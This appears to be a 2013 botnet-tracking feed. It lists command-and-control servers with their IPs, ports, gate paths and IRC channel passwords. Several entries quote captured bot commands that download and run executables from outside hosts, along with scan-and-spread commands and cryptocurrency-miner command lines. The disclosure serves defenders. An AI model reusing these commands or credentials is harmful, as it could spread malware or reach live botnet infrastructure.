Resolved strike-digital.info to 46.166.184.109 Server: strike-digital.info Port: 8888 Channel: #Fenix Channel password: nxnxnx A betabot belonging to the same guy is hosted on the same ip. Hosting infos: http://whois.domaintools.com/46.166.184.109
guard4you.info (Betabot http botnet hosted by ecatel.net)
Resolved guard4you.info to 80.82.66.26 Server: guard4you.info Gate file: /customer/order.php Alternate domains: nexusguardian.info vote4us.info meet2n8.info This is the same idiot as this previous betabot. After three of the free domains he used were suspended due to reports (lol), he decided try again with paid domains. He’s upgraded to four .info domains registered at namecheap, probably allRead more...
31.31.77.195(lightaidra Router Botnet hosted in Czech Republic Hluboka Nad Vltavou Wedos Internet A.s.)
This bot infects routers Credits to x00 31.31.77.195:5060 Current Local Users: 2528 Max: 2534 Current Global Users: 2528 Max: 2534 Now talking in #sc4n Topic: .sc4n->random->b root admin Topic: Set by [infected (unknown address)] at (Mon May 06 02:31:20 2013) #sc4n x00 @Albert-Wesker @infected 400 linux bots http://ircqk.nixhosting.org/conf/mel x00@x00 /tmp $ file melRead more...
irc.antisecbrteam.tk(Dbot hosted in Brazil Sao Paulo Royalfit Comercio De Artigos Esportivos Ltda)
Resolved : [irc.antisecbrteam.tk] To [201.54.16.10] Server: 201.54.16.10:6667 Server Password: Username: zbotmhz Nickname: L2-3891 Channel: #SpkB2 (Password: SpkDbot762) Channeltopic: Now talking in #SpkB2 Topic On: [ #SpkB2 ] [ .scan 75 1 177.x.x.x 2 1 177.x.x.x ] Topic By: [ xHide ] around 110 Dbots used for vnc brute and spread JOIN #SpkB0 SpkBot762 Now talkingRead more...
e.balkrev.com(ngrBot hosted in China Changsha Chinanet Hunan Province Network)
Resolved : [e.balkrev.com] To [124.232.150.214] Resolved : [e.balkrev.com] To [60.172.229.40] Resolved : [e.balkrev.com] To [124.232.163.154] Resolved : [e.balkrev.com] To [124.232.163.150] Resolved : [e.balkrev.com] To [124.232.163.119] TCP Traffic: e.balkrev.com:6510 PASS smart Data received: :Fax!Max@hub.us.com ppppmsg n[US{XPa{jikgbsd!jikgbsd@64.31.35.159 JOIN :#dpi [US{XPa{jikgbsd3a2f #dpi :!dl hxxp://146.185.246.160/dqw7.exe !dl hxxp://146.185.246.160/ups.exe !dl hxxp://146.185.246.160/43n.exe !mdns hxxp://salsayvariando.com/av.txt n[US{XPa{jikgbsd!jikgbsd@64.31. JOIN :#mss n[US{XPa{jikgbsd @ #mss so channelsRead more...
were.hacked.jp(irc botnet hosted in France Roubaix Ovh Systems)
Thanks to anonymous guy in this post for the sample Resolved : [were.hacked.jp] To [176.31.123.56] Server: 176.31.123.56:8782Server Password:Username: __x00Nickname: {x00-00-DEU-XP-DELL-9640}Channel: ###x00### (Password: )Channeltopic: :.ban |.scan sshspreadscan 120 7 0 41.x.x.x sample here hosting infos: http://whois.domaintools.com/176.31.123.56
208.89.209.54 (Irc botnet hosted by virpus.com)
Server: 208.89.209.54 Port: 6667 Current global users 77, max 695 Channels: #goon 3 #aryan 39 #OFFLINE#flood 1 ##yBz## 15 ##Offline## 19 Aryan bots: Channel: #aryan Topic for #aryan is: #OFFLINE Topic for #aryan set by formality at Sun May 05 16:23:03 2013 Linux bots: Channel: ##Offline## Channel: ##yBz## Hosting infos: http://whois.domaintools.com/208.89.209.54
betabros.in (Several http botnets hosted by hostkey.ru)
Resolved betabros.in to 146.0.78.4 Server: betabros.in Gate file: /beta/order.php The owner should keep a closer eye on the fake forum he setup for cover. 1071 pages of pharmacy spam and counting. Hosting infos: http://whois.domaintools.com/146.0.78.4 EDIT: Bitcoin and litecoin mining. macromedia.exe -a scrypt -o http://us.litecoinpool.org:9332 -u marvid.disfig -p x shell.exe -o stratum+tcp://stratum.btcguild.com:3333 -u vapor_3 -p xRead more...
jkdef8.ws (Betabot http botnet hosted by ecatel.net)
Resolved jkdef8.ws to 94.102.51.117 Server: jkdef8.ws Gate file: /papka/order.php Alternate domains (currently unregistered): jkdef6.ws jkdef7.ws jkdef10.ws jkdef11.ws jkdef12.ws jkdef13.ws jkdef14.ws jkdef15.ws jkdef16.ws jkdef17.ws jkdef18.ws jkdef19.ws jkdef20.ws jkdef21.ws jkdef22.ws Bitcoin mining info: http://pooledbits.com:8337 -u nigfinity.1 -p x Hosting infos: http://whois.domaintools.com/94.102.51.117
msn.3utilities.com (Betabot http botnet hosted by ecatel.net)
Resolved msn.3utilities.com to 80.82.66.43 Server: msn.3utilities.com Port: 81 Gate file: /help/order.php Alternate domains: videoparadise.biz kittybook.biz msn1981.3utilities.com dates4you.tk Three out of the five domains are free and easy to get suspended. Pro botherder here. Bitcoin mining info: stratum+tcp://eu-stratum.btcguild.com:3333 -u m4tr1x_neo -p 123 -t 0 -I -3 Litecoin mining info: -a scrypt -o http://kittybook.no-ip.biz:8332 -u m4tr1x_0Read more...